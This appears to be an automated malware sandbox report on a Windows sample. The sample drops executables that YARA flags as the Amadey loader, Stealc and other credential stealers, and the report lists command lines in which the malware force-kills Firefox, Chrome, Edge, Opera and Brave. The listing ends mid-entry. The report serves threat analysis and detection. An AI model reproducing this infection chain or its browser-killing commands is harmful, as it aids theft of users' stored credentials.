Session ID	Source IP	Source Port	Destination IP	Destination Port
145	192.168.2.5	49861	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:52 UTC	192	OUT	GET /rules/rule700750v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:52 UTC	538	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:52 GMT Content-Type: text/xml Content-Length: 1377 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:02 GMT ETag: "0x8DC582BEAFF0125" x-ms-request-id: 87019636-c01e-0082-15c7-2caf72000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163152Z-16547b76f7f9bs6dhC1DFWt3rg00000003vg00000000fbd2 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:52 UTC	1377	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 75 74 6c 6f 6f 6b 44 65 73 6b 74 6f 70 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookDesktop" S="Medium" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
146	192.168.2.5	49862	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:52 UTC	192	OUT	GET /rules/rule700151v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:52 UTC	517	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:52 GMT Content-Type: text/xml Content-Length: 1399 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT ETag: "0x8DC582BE0A2434F" x-ms-request-id: 9063af41-401e-0064-7ed2-2c54af000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163152Z-16547b76f7fq9mcrhC1DFWq15w00000003t000000000r4zm x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:52 UTC	1399	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 6e 65 4e 6f 74 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OneNote.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOn

Session ID	Source IP	Source Port	Destination IP	Destination Port
147	192.168.2.5	49863	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:52 UTC	192	OUT	GET /rules/rule700150v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:52 UTC	515	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:52 GMT Content-Type: text/xml Content-Length: 1362 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT ETag: "0x8DC582BE54CA33F" x-ms-request-id: d2681c78-b01e-0097-565c-2e4f33000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163152Z-176bd8f9bc5bc7vmhC1DFWbxbs00000006a0000000001fnr x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:52 UTC	1362	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 6e 65 4e 6f 74 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 6e 65 4e 6f 74 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OneNote" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOneNote" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
148	192.168.2.5	49864	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:52 UTC	192	OUT	GET /rules/rule703451v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:53 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:53 GMT Content-Type: text/xml Content-Length: 1409 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BDFC438CF" x-ms-request-id: 03f1b86e-501e-0029-515f-2ed0b8000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163153Z-176bd8f9bc598x8vhC1DFWq73s0000000650000000002p9d x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:53 UTC	1409	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703451" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OfficeMobile.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTo

Session ID	Source IP	Source Port	Destination IP	Destination Port
149	192.168.2.5	49866	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:53 UTC	192	OUT	GET /rules/rule700901v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:53 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:53 GMT Content-Type: text/xml Content-Length: 1408 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE1038EF2" x-ms-request-id: e94add16-701e-005c-0668-2ebb94000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163153Z-15869dbbcc6lq2lzhC1DFWsurc00000003sg000000009pw2 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:53 UTC	1408	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 39 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4e 61 74 75 72 61 6c 4c 61 6e 67 75 61 67 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700901" V="1" DC="SM" EN="Office.Telemetry.Event.Office.NaturalLanguage.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan

Target ID:	0
Start time:	11:31:13
Start date:	04/11/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x8c0000
File size:	3'288'064 bytes
MD5 hash:	4316E6BFA31A0F5639AB60AD32C2F672
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.2214492721.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	11:31:16
Start date:	04/11/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Imagebase:	0xb20000
File size:	3'288'064 bytes
MD5 hash:	4316E6BFA31A0F5639AB60AD32C2F672
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.2242682301.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
Antivirus matches:	Detection: 47%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	11:31:16
Start date:	04/11/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Imagebase:	0xb20000
File size:	3'288'064 bytes
MD5 hash:	4316E6BFA31A0F5639AB60AD32C2F672
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000002.2245012498.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	11:32:00
Start date:	04/11/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Imagebase:	0xb20000
File size:	3'288'064 bytes
MD5 hash:	4316E6BFA31A0F5639AB60AD32C2F672
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	11:32:11
Start date:	04/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe"
Imagebase:	0xa60000
File size:	1'192'960 bytes
MD5 hash:	D1629F3C794978E4A261000D117014DC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 29%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	11:32:11
Start date:	04/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	11:32:21
Start date:	04/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe"
Imagebase:	0x8a0000
File size:	2'977'792 bytes
MD5 hash:	00280DC5049562D147E25FE7E545007C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000003.2957615256.0000000000D9A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000003.2890126732.0000000000D96000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000003.2912786822.0000000000D96000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 42%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	11:32:25
Start date:	04/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe"
Imagebase:	0xa60000
File size:	1'192'960 bytes
MD5 hash:	D1629F3C794978E4A261000D117014DC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000003.2960102446.000000000349B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000003.2961051279.000000000349B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000003.2924857239.0000000003498000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000003.2961848227.000000000349B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000003.2980997521.000000000349B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000003.2943421605.0000000003498000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000003.2988852728.00000000034A2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000003.2979610284.0000000003499000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000003.2976118419.0000000003499000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000003.2959742429.0000000003498000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000003.2926225223.000000000349B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000003.2959907784.000000000349B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000003.2941976791.0000000003498000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000003.2988528325.000000000349B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000003.2980648761.0000000003499000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	11:32:25
Start date:	04/11/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7796 -s 264
Imagebase:	0x7e0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	11:32:30
Start date:	04/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe"
Imagebase:	0xb10000
File size:	2'124'288 bytes
MD5 hash:	C31A9B8F636DD5219331381E6120A997
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000E.00000002.3540303643.0000000000B11000.00000040.00000001.01000000.0000000C.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000E.00000002.3556235147.000000000160E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000E.00000003.2960979403.00000000051A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 39%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	15
Start time:	11:32:35
Start date:	04/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe"
Imagebase:	0x8a0000
File size:	2'977'792 bytes
MD5 hash:	00280DC5049562D147E25FE7E545007C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000003.3040960830.00000000013FF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000003.3128818775.00000000013F6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000003.3122949469.00000000013F6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000003.3125220663.00000000013F6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000003.3106303828.00000000013F6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000003.3120888829.00000000013F6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000003.3055337116.00000000013FF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000003.3102256253.00000000013F5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000003.3112345519.00000000013F6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000003.3110627341.00000000013F6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000003.3133983224.00000000013FB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000F.00000003.3420827049.00000000087E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000003.3127009361.00000000013F6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000003.3074568710.00000000013F5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	11:32:38
Start date:	04/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe"
Imagebase:	0xcc0000
File size:	919'552 bytes
MD5 hash:	40AD6330DCB8BBFDE0F879223B84D0E0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialFlusher, Description: Yara detected Credential Flusher, Source: 00000010.00000003.3077740668.00000000016CF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 47%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	11:32:38
Start date:	04/11/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM firefox.exe /T
Imagebase:	0xd40000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	11:32:38
Start date:	04/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	11:32:40
Start date:	04/11/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM chrome.exe /T
Imagebase:	0xd40000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	11:32:40
Start date:	04/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff632ac0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	11:32:40
Start date:	04/11/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM msedge.exe /T
Imagebase:	0xd40000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	11:32:40
Start date:	04/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	11:32:41
Start date:	04/11/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM opera.exe /T
Imagebase:	0xd40000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	11:32:41
Start date:	04/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	11:32:41
Start date:	04/11/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM brave.exe /T
Imagebase:	0xd40000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
